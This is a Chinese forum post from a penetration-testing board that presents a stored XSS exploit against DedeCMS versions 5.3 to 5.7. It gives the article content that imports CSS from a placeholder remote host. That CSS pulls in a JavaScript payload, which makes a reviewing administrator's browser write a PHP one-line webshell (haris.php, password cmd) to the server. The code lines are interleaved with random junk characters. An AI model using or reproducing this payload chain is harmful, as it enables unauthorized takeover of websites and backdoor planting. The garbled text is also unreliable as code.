找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2554|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell2 y/ p' ^7 w# C2 R: N+ D* j
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)5 ~5 S' s, e9 N+ a8 g- K
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。* f4 D6 D  }/ P5 p% q* I" V0 E
下面说说利用方法。
* D" l' ^9 U+ a- [) R) }4 w条件有2个:
, Z8 t+ g' \( X1 }9 {1.开启注册
0 Z% N2 q) o# V- H2.开启投稿
5 V5 x. C% |3 p; A. M注册会员----发表文章
  M. g5 }* T2 c内容填写:
- D* W3 h+ L& V) W; c: b复制代码/ P6 ?  e1 S* }$ C% a
<style>@im\port'\http://xxx.com/xss.css';</style>; H% d/ ~5 w5 ~
新建XSS.Css( i9 \1 ^1 `+ K2 k
复制代码. ?2 Z3 v* d0 y
.body{% q, f0 B2 P+ K& T1 P# A# o
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
3 ^; K: f3 a6 ^! v新建xss.js 内容为% ], H. B8 D# {( \7 m: j0 y" X- [1 R
复制代码7 X7 j; \# h, I1 Q: B
1.var request = false;
# r( e( p8 V* k' z% n5 \2.if(window.XMLHttpRequest) {( Q4 s4 L! d" |, D' _8 U
3.request = new XMLHttpRequest();
9 H9 c$ D8 Z: b4.if(request.overrideMimeType) {
- T: R' h) ]" N8 L; q5.request.overrideMimeType('text/xml');
. |* `6 t. L1 i, r: x6.}' w3 q& y( K+ U+ e+ K4 c1 F
7.} else if(window.ActiveXObject) {
9 a  a3 B" D, ]8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];" F7 f( M  K" `0 @1 |
9.for(var i=0; i<versions.length; i++) {
$ r8 F+ Q9 L3 ]& v- u7 S10.try {
. u9 }+ c  H3 k4 p9 l8 k11.request = new ActiveXObject(versions);( B1 p! d) p' s0 ^$ b4 c
12.} catch(e) {}$ K$ t; q* P0 z, j0 g9 y
13.}
5 D7 z/ I6 X2 l3 A* A! J; @3 v8 {14.}4 J8 }4 J. h6 O% u
15.xmlhttp=request;8 L+ n  g/ V$ `: K& ]
16.function getFolder( url ){
& c5 y6 Z+ A8 G6 K0 P, ?# L1 }5 j17. obj = url.split('/')
: ]) M6 y+ v" W/ ~4 f* S18. return obj[obj.length-2]# p* L4 C6 o; \1 U
19.}' |3 T* q& r) H" O, A- A
20.oUrl = top.location.href;' S- L3 \" Z% O  X+ w' v. ~
21.u = getFolder(oUrl);
4 q2 X- w3 k, p+ O: n! _+ M22.add_admin();
. C% r9 G4 m% \, U23.function add_admin(){
# g/ t. N2 J; v. t% @24.var url= "/"+u+"/sys_sql_query.php";' F0 T8 Y4 f: s, h4 q( R7 u
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";8 _) ~, V& Y/ {( p
26.xmlhttp.open("POST", url, true);
# ~4 L9 G7 o9 g8 F0 A2 ?27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
8 [3 \$ {1 C* v6 C28.xmlhttp.setRequestHeader("Content-length", params.length);" a& V* T1 n' Y2 j+ s8 _0 N* K$ E+ [
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");# o. j& ], N. T, b- m2 h  L' P
30.xmlhttp.send(params);
) |; {: o+ X6 l; e% I) W) `31.}9 z; {9 J  u: b1 y! O* b
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表